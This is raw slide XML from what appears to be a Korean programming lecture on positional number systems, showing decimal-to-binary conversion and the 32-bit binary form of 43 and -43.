            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>올랐어</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905240"/>
            <a:ext cx="2247007" cy="740529"/>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카카오는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>43.6875% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>올랐어</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04224" y="647541"/>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426314"/>
            <a:ext cx="2435702" cy="810406"/>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err="1"/>
              <a:t>비트코인은</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>-43% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0"/>
              <a:t>떨어졌어</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{519C2B79-3073-4430-9E9D-90253A5F30C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1689470" y="1674855"/>
            <a:ext cx="712354" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>양수</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA8607C0-93B5-4FB9-9A46-5ACC2CFE7C94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5211428" y="1990874"/>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1999694" y="2831213"/>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444049" y="1654307"/>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a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="2035995"/>
            <a:ext cx="171159" cy="288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726903" y="2065255"/>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983276" y="2349881"/>
            <a:ext cx="446015" cy="623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flipH="1">
            <a:off x="2286000" y="3200545"/>
            <a:ext cx="45640" cy="34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2" descr="A tech walkthrough of metal gate I/O transistors(3)">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA1AD486-1CFE-4D12-AEF8-275E1FAC53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8006" y="2324145"/>
            <a:ext cx="2586672" cy="1826190"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="그림 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{108A071A-CAEA-451A-9968-3FBE806DB353}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6756810" y="4150335"/>
            <a:ext cx="5003045" cy="2306466"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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양수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C 언어 코딩 도장: 36.9 배열을 활용하여 10진수를 2진수로 변환하기">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53D9718F-035F-4889-91F3-E2C2C5525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6427" y="2363343"/>
            <a:ext cx="5607150" cy="3094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1503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87E3274D-1B65-4BEE-B181-1C4011C39B51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2639568" y="2109216"/>
            <a:ext cx="7370064" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>132</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>4  (10) = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> * 1000 + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> * 100 + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> * 10 + 4 * 1</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF3F50D9-455D-47B7-A559-C99BE2ADA1D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2755392" y="2478548"/>
            <a:ext cx="7370064" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>132 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> (10) = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> * 100   + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> * 10  + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> * 1 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30E42E42-3E4B-4567-AC5C-75B17D2EC170}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2639568" y="3032546"/>
            <a:ext cx="7370064" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>132</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>4 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>132</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> * 10 + 4</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C7758AB-604C-4974-B7A0-EF63BFA9C7F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2639568" y="3640789"/>
            <a:ext cx="7370064" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>110</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>1  (2) = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> * 8 + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> * 4 + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> * 2 + 1 * 1</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9750EAFF-2D35-45D4-A521-E350023D6161}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2767584" y="4010121"/>
            <a:ext cx="7370064" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>110 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> (2) = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> * 4 + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> * 2 + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> * 1 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF9CFC94-5A14-40BD-9076-150E1E88D159}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2639568" y="4564119"/>
            <a:ext cx="7370064" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>110</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>1 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>110</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> * 2 + 1</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="직선 화살표 연결선 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3E253C8-FEE4-414F-B183-C27EE0BC841F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2936759" y="4933451"/>
            <a:ext cx="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8F39380-F8D4-400C-A246-A947094C4C32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2278379" y="5447310"/>
            <a:ext cx="2953146" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>     13    =  6*2 +1</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="직사각형 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B40967FA-D68D-451D-A1CC-B3E2F609FDFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2639568" y="4564119"/>
            <a:ext cx="627200"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2A3D4518-B158-4E3D-ADEB-049F551C7DE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3534992" y="4564119"/>
            <a:ext cx="439921" cy="369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화살표 연결선 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1C4F32D-5AAD-49E6-B52A-77C9A26E2D5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="27" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3754952" y="4933451"/>
            <a:ext cx="1" cy="553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7" name="직선 연결선 1026">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{264AC1A1-71BB-42F4-A54D-F1DC9AA44D49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="0" y="3401878"/>
            <a:ext cx="12177027" cy="136164"/>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B5A81AB-DD64-47D1-A527-CD4509663207}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="996902" y="6113661"/>
            <a:ext cx="8765223" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>     13 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>진법으로 표현하려면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>,  6 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>진법으로 표현한후 뒤에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>을 추가하면 된다</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="TextBox 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C2104A4-D2CA-4F17-99E5-3BBEFD1B38C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4068727" y="1662011"/>
            <a:ext cx="3544186" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B050"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>각 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>자리수에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 대한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>가치</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>‘ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>를 보자</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="257454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7" grpId="0" animBg="1"/>
      <p:bldP spid="37"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1982716-9971-4DF9-9E7C-54DEB4D66C97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1531089" y="2721934"/>
            <a:ext cx="9179442" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0"/>
              <a:t>43 =                                                          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0"/>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E5B4BAE3-40C9-4846-B7F8-9666CFA1A6CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1531089" y="2721934"/>
            <a:ext cx="9179442" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0"/>
              <a:t>43 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>000 0000 0000 0000 0000 0000 0010 1011(2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42F7DA70-2E62-4879-A1EA-DA708E1AA5E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1261731" y="3245154"/>
            <a:ext cx="9179442" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0"/>
              <a:t>- 43 = </a:t>
            </a:r>
            <a:r>
